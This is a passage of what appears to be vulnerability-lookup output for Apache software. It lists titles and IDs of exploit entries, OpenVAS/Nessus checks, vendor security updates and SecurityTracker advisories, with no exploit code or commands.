7026| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
7027| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
7028| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
7029| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
7030| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
7031| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
7032| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
7033| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
7034| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
7035| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
7036| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
7037| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
7038| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
7039| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
7040| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
7041| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
7042| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
7043| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
7044| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
7045| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
7046| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
7047| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
7048| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
7049| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
7050| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
7051| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
7052| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
7053| [466] htpasswd Apache 1.3.31 - Local Exploit
7054| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
7055| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
7056| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
7057| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
7058| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
7059| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
7060| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
7061| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
7062| [9] Apache HTTP Server 2.x Memory Leak Exploit
7063|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
| [900571] Apache APR-Utils Version Detection
| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
| [900496] Apache Tiles Multiple XSS Vulnerability
| [900493] Apache Tiles Version Detection
| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
| [870175] RedHat Update for apache RHSA-2008:0004-01
| [864591] Fedora Update for apache-poi FEDORA-2012-10835
| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
| [864250] Fedora Update for apache-poi FEDORA-2012-7683
| [864249] Fedora Update for apache-poi FEDORA-2012-7686
| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
| [855821] Solaris Update for Apache 1.3 122912-19
| [855812] Solaris Update for Apache 1.3 122911-19
| [855737] Solaris Update for Apache 1.3 122911-17
| [855731] Solaris Update for Apache 1.3 122912-17
| [855695] Solaris Update for Apache 1.3 122911-16
| [855645] Solaris Update for Apache 1.3 122912-16
| [855587] Solaris Update for kernel update and Apache 108529-29
| [855566] Solaris Update for Apache 116973-07
| [855531] Solaris Update for Apache 116974-07
| [855524] Solaris Update for Apache 2 120544-14
| [855494] Solaris Update for Apache 1.3 122911-15
| [855478] Solaris Update for Apache Security 114145-11
| [855472] Solaris Update for Apache Security 113146-12
| [855179] Solaris Update for Apache 1.3 122912-15
| [855147] Solaris Update for kernel update and Apache 108528-29
| [855077] Solaris Update for Apache 2 120543-14
| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
| [850088] SuSE Update for apache2 SUSE-SA:2007:061
| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
| [841209] Ubuntu Update for apache2 USN-1627-1
| [840900] Ubuntu Update for apache2 USN-1368-1
| [840798] Ubuntu Update for apache2 USN-1259-1
| [840734] Ubuntu Update for apache2 USN-1199-1
| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
| [835253] HP-UX Update for Apache Web Server HPSBUX02645
| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
| [835236] HP-UX Update for Apache with PHP HPSBUX02543
| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
| [835188] HP-UX Update for Apache HPSBUX02308
| [835181] HP-UX Update for Apache With PHP HPSBUX02332
| [835180] HP-UX Update for Apache with PHP HPSBUX02342
| [835172] HP-UX Update for Apache HPSBUX02365
| [835168] HP-UX Update for Apache HPSBUX02313
| [835148] HP-UX Update for Apache HPSBUX01064
| [835139] HP-UX Update for Apache with PHP HPSBUX01090
| [835131] HP-UX Update for Apache HPSBUX00256
| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
| [835104] HP-UX Update for Apache HPSBUX00224
| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
| [835101] HP-UX Update for Apache HPSBUX01232
| [835080] HP-UX Update for Apache HPSBUX02273
| [835078] HP-UX Update for ApacheStrong HPSBUX00255
| [835044] HP-UX Update for Apache HPSBUX01019
| [835040] HP-UX Update for Apache PHP HPSBUX00207
| [835025] HP-UX Update for Apache HPSBUX00197
| [835023] HP-UX Update for Apache HPSBUX01022
| [835022] HP-UX Update for Apache HPSBUX02292
| [835005] HP-UX Update for Apache HPSBUX02262
| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
| [801942] Apache Archiva Multiple Vulnerabilities
| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
| [801284] Apache Derby Information Disclosure Vulnerability
| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
| [800680] Apache APR Version Detection
| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
| [800677] Apache Roller Version Detection
| [800279] Apache mod_jk Module Version Detection
| [800278] Apache Struts Cross Site Scripting Vulnerability
| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
| [800276] Apache Struts Version Detection
| [800271] Apache Struts Directory Traversal Vulnerability
| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
| [103122] Apache Web Server ETag Header Information Disclosure Weakness
| [103074] Apache Continuum Cross Site Scripting Vulnerability
| [103073] Apache Continuum Detection
| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
| [101023] Apache Open For Business Weak Password security check
| [101020] Apache Open For Business HTML injection vulnerability
| [101019] Apache Open For Business service detection
| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
| [100923] Apache Archiva Detection
| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
| [100813] Apache Axis2 Detection
| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
| [100795] Apache Derby Detection
| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
| [100514] Apache Multiple Security Vulnerabilities
| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
| [72626] Debian Security Advisory DSA 2579-1 (apache2)
| [72612] FreeBSD Ports: apache22
| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
| [71512] FreeBSD Ports: apache
| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
| [71256] Debian Security Advisory DSA 2452-1 (apache2)
| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
| [70737] FreeBSD Ports: apache
| [70724] Debian Security Advisory DSA 2405-1 (apache2)
| [70600] FreeBSD Ports: apache
| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
| [70235] Debian Security Advisory DSA 2298-2 (apache2)
| [70233] Debian Security Advisory DSA 2298-1 (apache2)
| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
| [69338] Debian Security Advisory DSA 2202-1 (apache2)
| [67868] FreeBSD Ports: apache
| [66816] FreeBSD Ports: apache
| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
| [66081] SLES11: Security update for Apache 2
| [66074] SLES10: Security update for Apache 2
| [66070] SLES9: Security update for Apache 2
| [65998] SLES10: Security update for apache2-mod_python
| [65893] SLES10: Security update for Apache 2
| [65888] SLES10: Security update for Apache 2
| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
| [65510] SLES9: Security update for Apache 2
| [65472] SLES9: Security update for Apache
| [65467] SLES9: Security update for Apache
| [65450] SLES9: Security update for apache2
| [65390] SLES9: Security update for Apache2
| [65363] SLES9: Security update for Apache2
| [65309] SLES9: Security update for Apache and mod_ssl
| [65296] SLES9: Security update for webdav apache module
| [65283] SLES9: Security update for Apache2
| [65249] SLES9: Security update for Apache 2
| [65230] SLES9: Security update for Apache 2
| [65228] SLES9: Security update for Apache 2
| [65212] SLES9: Security update for apache2-mod_python
| [65209] SLES9: Security update for apache2-worker
| [65207] SLES9: Security update for Apache 2
| [65168] SLES9: Security update for apache2-mod_python
| [65142] SLES9: Security update for Apache2
| [65136] SLES9: Security update for Apache 2
| [65132] SLES9: Security update for apache
| [65131] SLES9: Security update for Apache 2 oes/CORE
| [65113] SLES9: Security update for apache2
| [65072] SLES9: Security update for apache and mod_ssl
| [65017] SLES9: Security update for Apache 2
| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
| [64783] FreeBSD Ports: apache
| [64774] Ubuntu USN-802-2 (apache2)
| [64653] Ubuntu USN-813-2 (apache2)
| [64559] Debian Security Advisory DSA 1834-2 (apache2)
| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
| [64443] Ubuntu USN-802-1 (apache2)
| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
| [64423] Debian Security Advisory DSA 1834-1 (apache2)
| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
| [64251] Debian Security Advisory DSA 1816-1 (apache2)
| [64201] Ubuntu USN-787-1 (apache2)
| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
| [63565] FreeBSD Ports: apache
| [63562] Ubuntu USN-731-1 (apache2)
| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
| [61185] FreeBSD Ports: apache
| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
| [60387] Slackware Advisory SSA:2008-045-02 apache
| [58826] FreeBSD Ports: apache-tomcat
| [58825] FreeBSD Ports: apache-tomcat
| [58804] FreeBSD Ports: apache
| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
| [57335] Debian Security Advisory DSA 1167-1 (apache)
| [57201] Debian Security Advisory DSA 1131-1 (apache)
| [57200] Debian Security Advisory DSA 1132-1 (apache2)
| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
| [57145] FreeBSD Ports: apache
| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
| [56067] FreeBSD Ports: apache
| [55803] Slackware Advisory SSA:2005-310-04 apache
| [55519] Debian Security Advisory DSA 839-1 (apachetop)
| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
| [55355] FreeBSD Ports: apache
| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
| [55261] Debian Security Advisory DSA 805-1 (apache2)
| [55259] Debian Security Advisory DSA 803-1 (apache)
| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
| [54439] FreeBSD Ports: apache
| [53931] Slackware Advisory SSA:2004-133-01 apache
| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
| [53878] Slackware Advisory SSA:2003-308-01 apache security update
| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
| [53848] Debian Security Advisory DSA 131-1 (apache)
| [53784] Debian Security Advisory DSA 021-1 (apache)
| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
| [53735] Debian Security Advisory DSA 187-1 (apache)
| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
| [53282] Debian Security Advisory DSA 594-1 (apache)
| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
| [53215] Debian Security Advisory DSA 525-1 (apache)
| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
| [52529] FreeBSD Ports: apache+ssl
| [52501] FreeBSD Ports: apache
| [52461] FreeBSD Ports: apache
| [52390] FreeBSD Ports: apache
| [52389] FreeBSD Ports: apache
| [52388] FreeBSD Ports: apache
| [52383] FreeBSD Ports: apache
| [52339] FreeBSD Ports: apache+mod_ssl
| [52331] FreeBSD Ports: apache
| [52329] FreeBSD Ports: ru-apache+mod_ssl
| [52314] FreeBSD Ports: apache
| [52310] FreeBSD Ports: apache
| [15588] Detect Apache HTTPS
| [15555] Apache mod_proxy content-length buffer overflow
| [15554] Apache mod_include priviledge escalation
| [14771] Apache <= 1.3.33 htpasswd local overflow
| [14177] Apache mod_access rule bypass
| [13644] Apache mod_rootme Backdoor
| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
| [12280] Apache Connection Blocking Denial of Service
| [12239] Apache Error Log Escape Sequence Injection
| [12123] Apache Tomcat source.jsp malformed request information disclosure
| [12085] Apache Tomcat servlet/JSP container default files
| [11438] Apache Tomcat Directory Listing and File disclosure
| [11204] Apache Tomcat Default Accounts
| [11092] Apache 2.0.39 Win32 directory traversal
| [11046] Apache Tomcat TroubleShooter Servlet Installed
| [11042] Apache Tomcat DOS Device Name XSS
| [11041] Apache Tomcat /servlet Cross Site Scripting
| [10938] Apache Remote Command Execution via .bat files
| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
| [10773] MacOS X Finder reveals contents of Apache Web files
| [10766] Apache UserDir Sensitive Information Disclosure
| [10756] MacOS X Finder reveals contents of Apache Web directories
| [10752] Apache Auth Module SQL Insertion Attack
| [10704] Apache Directory Listing
| [10678] Apache /server-info accessible
| [10677] Apache /server-status accessible
| [10440] Check for Apache Multiple / vulnerability
|
| SecurityTracker - https://www.securitytracker.com:
| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
7448| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
7449| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
7450| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
7451| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
7452| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
7453| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
7454| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
7455| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
7456| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
7457| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
7458| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
7459| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
7460| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
7461| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
7462| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
7463| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
7464| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
7465| [1024096] Apache mod_proxy_http May Return Results for a Different Request
7466| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
7467| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
7468| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
7469| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
7470| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
7471| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
7472| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
7473| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
7474| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
7475| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
7476| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
7477| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
7478| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
7479| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7480| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
7481| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
7482| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
7483| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
7484| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
7485| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
7486| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
7487| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
